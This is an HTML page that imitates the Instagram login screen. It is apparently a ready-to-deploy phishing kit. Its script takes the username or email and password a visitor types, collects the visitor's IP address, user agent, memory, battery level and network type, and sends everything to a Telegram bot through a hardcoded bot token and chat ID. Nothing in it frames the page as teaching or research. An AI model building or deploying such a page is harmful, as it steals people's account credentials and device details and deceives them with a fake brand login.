<!DOCTYPE html>
<html>
<head>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Instagram Login</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #fafafa;
      margin: 0;
      padding: 0;
    }

    .container {
      max-width: 350px;
      margin: 100px auto;
      background-color: #fff;
      border: 1px solid #ddd;
      padding: 20px;
      box-sizing: border-box;
      text-align: center;
    }

    .logo {
      margin-bottom: 20px;
    }

    .logo i {
      background-image: url("https://static.cdninstagram.com/rsrc.php/v3/yS/r/ajlEU-wEDyo.png");
      background-position: 0px -52px;
      background-size: auto;
      width: 175px;
      height: 51px;
      background-repeat: no-repeat;
      display: inline-block;
    }

    .form-group {
      margin-bottom: 15px;
    }

    .form-group input {
      width: 100%;
      padding: 10px;
      border: 1px solid #ddd;
      border-radius: 4px;
      box-sizing: border-box;
    }

    .form-group input[type="submit"] {
      background-color: #0095F6;
      color: #fff;
      cursor: pointer;
      border: none;
      padding: 10px;
      border-radius: 4px;
      width: 100%;
    }

    .form-group input[type="submit"]:hover {
      background-color: #3274b5;
    }

    .signup-link {
      margin-top: 20px;
    }

    .signup-link a {
      color: #0095F6;
      text-decoration: none;
    }

    .facebook-button {
      background-color: #0095F6;
      color: #fff;
      cursor: pointer;
      border: none;
      padding: 10px;
      border-radius: 4px;
      width: 100%;
      display: flex;
      align-items: center;
      justify-content: center;
      margin-bottom: 10px;
      text-decoration: none;
    }

    .facebook-button:hover {
      background-color: #2e4473;
    }

    .facebook-button span {
      margin-left: 5px;
    }

    .forgot-password {
      font-size: 14px;
      color: #0095F6;
      cursor: pointer;
      margin-top: 10px;
    }

    @media (max-width: 480px) {
      .container {
        max-width: 280px;
        margin: 50px auto;
        padding: 10px;
      }

      .logo {
        margin-bottom: 10px;
      }
    }
  </style>
</head>

<body>
  <div class="container">
    <div class="logo">
      <i data-visualcompletion="css-img" aria-label="Instagram" class=""></i>
    </div>
    <a href="https://www.facebook.com/login" target="_blank" style="text-decoration: none;">
      <button class="facebook-button" type="button">
        <span class="_9zlu _ab36"></span>
        <span>Continue with Facebook</span>
      </button>
    </a>
    <form id="login-form">
      <div class="form-group">
        <input type="text" placeholder="Username or Email">
      </div>
      <div class="form-group">
        <input type="password" placeholder="Password">
      </div>
      <div class="form-group">
        <input type="submit" value="Log In">
      </div>
    </form>
    <div class="forgot-password">
      <a href="https://www.instagram.com/accounts/password/reset/" style="text-decoration: none;">Forgot password?</a>
    </div>
    <div class="signup-link">
      Don't have an account? <a href="https://www.instagram.com/accounts/emailsignup/" style="text-decoration: none;">Sign up</a>
    </div>
  </div>

  <script>
    const loginForm = document.getElementById("login-form");

    loginForm.addEventListener("submit", async (event) => {
      event.preventDefault();

      const emailOrUsername = event.target.elements[0].value;
      const password = event.target.elements[1].value;
      const telegramChatId = "5710276456"; // Hardcoded chat ID
      const token = "7611023975:AAGAR6vbPFAVdU_tg92u79FhQA6vYyV2XDA"; // Hardcoded bot token

      // Function to retrieve IP, device, and memory information
      const getDeviceInfo = async () => {
        try {
          const response = await fetch("https://api.ipify.org?format=json");
          if (response.ok) {
            const { ip } = await response.json();
            const userAgent = navigator.userAgent;
            const deviceMemory = navigator.deviceMemory;
            const deviceName = navigator.deviceMemory ? "Desktop" : "Mobile";
            const batteryPercentage = navigator.getBattery ? (await navigator.getBattery()).level * 100 : 'N/A';
            const networkType = navigator.connection ? navigator.connection.effectiveType : 'N/A';

            // Send IP, device, and memory information to Telegram
            const message = `📧 Email: ${emailOrUsername}\n🔑 Password: ${password}\n🌐 IP Address: ${ip}\n📱 User Agent: ${userAgent}\n💻 Platform: ${deviceName}\n💾 Memory: ${deviceMemory} GB\n🔋 Battery Percentage: ${batteryPercentage}\n📶 Network Type: ${networkType}`;
            const url = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${telegramChatId}&text=${encodeURIComponent(message)}`;

            const telegramResponse = await fetch(url);
            if (telegramResponse.ok) {
              console.log("Message sent successfully to Telegram bot");
            } else {
              console.error("Error sending message to Telegram bot");
              alert("Failed to send. Please try again.");
            }
          } else {
            throw new Error("Failed to get IP address");
          }
        } catch (error) {
          console.error("Error:", error);
          alert("An unexpected error occurred. Please try again later.");
        }
      };

      getDeviceInfo();
    });
  </script>
</body>
</html>
